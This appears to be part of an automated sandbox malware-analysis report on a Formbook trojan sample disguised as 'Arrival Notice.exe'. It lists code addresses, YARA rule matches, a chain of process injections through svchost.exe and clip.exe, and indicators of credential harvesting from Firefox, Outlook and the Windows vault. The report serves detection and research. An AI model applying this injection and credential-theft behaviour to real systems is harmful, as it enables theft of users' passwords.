            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_051775713_2_05177571
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0515D5B03_2_0515D5B0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_051895C33_2_051895C3
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0517F43F3_2_0517F43F
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_050B14603_2_050B1460
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0517F7B03_2_0517F7B0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_051056303_2_05105630
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_051716CC3_2_051716CC
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_050F516C3_2_050F516C
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0518B16B3_2_0518B16B
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_050AF1723_2_050AF172
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_050CB1B03_2_050CB1B0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_050C70C03_2_050C70C0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0516F0CC3_2_0516F0CC
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0517F0E03_2_0517F0E0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_051770E93_2_051770E9
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0517132D3_2_0517132D
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_050AD34C3_2_050AD34C
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0510739A3_2_0510739A
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_050C52A03_2_050C52A0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_050DB2C03_2_050DB2C0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_051612ED3_2_051612ED
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_050DD2F03_2_050DD2F0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_050C3D403_2_050C3D40
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_05171D5A3_2_05171D5A
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_05177D733_2_05177D73
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_050DFDC03_2_050DFDC0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_05139C323_2_05139C32
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0517FCF23_2_0517FCF2
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0517FF093_2_0517FF09
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_050C1F923_2_050C1F92
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0517FFB13_2_0517FFB1
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_05083FD23_2_05083FD2
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_05083FD53_2_05083FD5
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_050C9EB03_2_050C9EB0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_051559103_2_05155910
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_050C99503_2_050C9950
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_050DB9503_2_050DB950
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0512D8003_2_0512D800
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_050C38E03_2_050C38E0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0517FB763_2_0517FB76
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_050DFB803_2_050DFB80
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_05135BF03_2_05135BF0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_050FDBF93_2_050FDBF9
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_05177A463_2_05177A46
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0517FA493_2_0517FA49
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_05133A6C3_2_05133A6C
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_05105AA03_2_05105AA0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_05161AA33_2_05161AA3
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0515DAAC3_2_0515DAAC
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0516DAC63_2_0516DAC6
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_02F817203_2_02F81720
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_02F9A2803_2_02F9A280
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_02F7ABB03_2_02F7ABB0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_02F7CB303_2_02F7CB30
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_02F7C9103_2_02F7C910
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_02F7C9083_2_02F7C908
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_02F832703_2_02F83270
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04F0A43A3_2_04F0A43A
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04F0C0FC3_2_04F0C0FC
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04F0B1683_2_04F0B168
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04F0BC443_2_04F0BC44
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04F0BD643_2_04F0BD64
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03887E54 appears 107 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0382B970 appears 262 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 038AEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 038BF290 appears 103 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03875130 appears 58 times
            Source: C:\Windows\SysWOW64\clip.exeCode function: String function: 0513F290 appears 103 times
            Source: C:\Windows\SysWOW64\clip.exeCode function: String function: 050AB970 appears 262 times
            Source: C:\Windows\SysWOW64\clip.exeCode function: String function: 0512EA12 appears 86 times
            Source: C:\Windows\SysWOW64\clip.exeCode function: String function: 05107E54 appears 107 times
            Source: C:\Windows\SysWOW64\clip.exeCode function: String function: 050F5130 appears 58 times
            Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: String function: 003D0A30 appears 46 times
            Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: String function: 003CF9F2 appears 31 times
            Source: Arrival Notice.exe, 00000000.00000003.1658529365.0000000003B53000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Arrival Notice.exe
            Source: Arrival Notice.exe, 00000000.00000003.1657932707.0000000003CAD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Arrival Notice.exe
            Source: Arrival Notice.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.1863602986.0000000003680000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.4134600469.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.4136078962.0000000004A80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.4136098252.0000000004E20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.4136001289.0000000003520000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.1864681477.0000000005C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.1863228024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/5@15/10
            Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_004237B5 GetLastError,FormatMessageW,0_2_004237B5
            Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_004110BF AdjustTokenPrivileges,CloseHandle,0_2_004110BF
            Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_004116C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_004116C3
            Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_004251CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_004251CD
            Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_0043A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_0043A67C
            Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_0042648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,0_2_0042648E
            Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_003B42A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_003B42A2
            Source: C:\Users\user\Desktop\Arrival Notice.exeFile created: C:\Users\user\AppData\Local\Temp\autCCA.tmpJump to behavior
            Source: Arrival Notice.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\Arrival Notice.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: clip.exe, 00000003.00000003.2037350108.0000000003300000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4134866253.0000000003322000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000003.00000003.2037451842.0000000003322000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: Arrival Notice.exeReversingLabs: Detection: 36%
            Source: Arrival Notice.exeVirustotal: Detection: 27%
            Source: unknownProcess created: C:\Users\user\Desktop\Arrival Notice.exe "C:\Users\user\Desktop\Arrival Notice.exe"
            Source: C:\Users\user\Desktop\Arrival Notice.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Arrival Notice.exe"
            Source: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exeProcess created: C:\Windows\SysWOW64\clip.exe "C:\Windows\SysWOW64\clip.exe"
            Source: C:\Windows\SysWOW64\clip.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\Arrival Notice.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Arrival Notice.exe"Jump to behavior
            Source: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exeProcess created: C:\Windows\SysWOW64\clip.exe "C:\Windows\SysWOW64\clip.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\clip.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Arrival Notice.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\Arrival Notice.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Arrival Notice.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\Arrival Notice.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\Arrival Notice.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\Arrival Notice.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Arrival Notice.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\Arrival Notice.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Arrival Notice.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Arrival Notice.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Arrival Notice.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Arrival Notice.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\clip.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: Arrival Notice.exeStatic file information: File size 1287680 > 1048576
            Source: Arrival Notice.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: Arrival Notice.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: Arrival Notice.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: Arrival Notice.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Arrival Notice.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: Arrival Notice.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: Arrival Notice.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000002.00000000.1783713149.000000000098E000.00000002.00000001.01000000.00000004.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4134616336.000000000098E000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: Arrival Notice.exe, 00000000.00000003.1657575687.0000000003B80000.00000004.00001000.00020000.00000000.sdmp, Arrival Notice.exe, 00000000.00000003.1658529365.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1863649908.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1764019679.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1863649908.000000000399E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1768607791.0000000003600000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000003.00000003.1863174588.0000000004D25000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4136272077.0000000005080000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4136272077.000000000521E000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000003.00000003.1866257159.0000000004ED5000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Arrival Notice.exe, 00000000.00000003.1657575687.0000000003B80000.00000004.00001000.00020000.00000000.sdmp, Arrival Notice.exe, 00000000.00000003.1658529365.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.1863649908.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1764019679.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1863649908.000000000399E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1768607791.0000000003600000.00000004.00000020.00020000.00000000.sdmp, clip.exe, clip.exe, 00000003.00000003.1863174588.0000000004D25000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4136272077.0000000005080000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4136272077.000000000521E000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000003.00000003.1866257159.0000000004ED5000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: clip.pdb source: svchost.exe, 00000001.00000002.1863405083.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1831030216.0000000003214000.00000004.00000020.00020000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000002.00000002.4135623899.0000000001108000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: clip.exe, 00000003.00000002.4136624660.00000000056AC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.4134866253.00000000032A5000.00000004.00000020.00020000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4136230537.00000000031BC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2147546281.000000000788C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: clip.exe, 00000003.00000002.4136624660.00000000056AC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.4134866253.00000000032A5000.00000004.00000020.00020000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4136230537.00000000031BC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2147546281.000000000788C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: clip.pdbGCTL source: svchost.exe, 00000001.00000002.1863405083.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1831030216.0000000003214000.00000004.00000020.00020000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000002.00000002.4135623899.0000000001108000.00000004.00000020.00020000.00000000.sdmp
            Source: Arrival Notice.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: Arrival Notice.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: Arrival Notice.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: Arrival Notice.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: Arrival Notice.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_003B42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_003B42DE
            Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_003D0A76 push ecx; ret 0_2_003D0A89
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004031C0 push eax; ret 1_2_004031C2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004161D3 push ecx; ret 1_2_004162EE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004162CC push ecx; ret 1_2_004162EE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00417356 push ebx; retf 1_2_00417359
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00416338 push ecx; ret 1_2_004162EE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004083DA push es; ret 1_2_004083DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040BBEC pushad ; iretd 1_2_0040BBEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00418577 push 2823B84Bh; retf 1_2_00418587
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00417D38 push ecx; iretd 1_2_00417D39
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00401E6C push dword ptr [ebx+3E93C2B8h]; retf 1_2_00401EDE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00411E39 push esp; ret 1_2_00411E41
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00401ECE push dword ptr [ebx+3E93C2B8h]; retf 1_2_00401EDE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0380225F pushad ; ret 1_2_038027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038027FA pushad ; ret 1_2_038027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038309AD push ecx; mov dword ptr [esp], ecx1_2_038309B6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0380283D push eax; iretd 1_2_03802858
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03801368 push eax; iretd 1_2_03801369
            Source: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exeCode function: 2_2_04A85486 pushad ; iretd 2_2_04A85488
            Source: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exeCode function: 2_2_04A81C74 push es; ret 2_2_04A81C78
            Source: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exeCode function: 2_2_04A915D2 push ecx; iretd 2_2_04A915D3
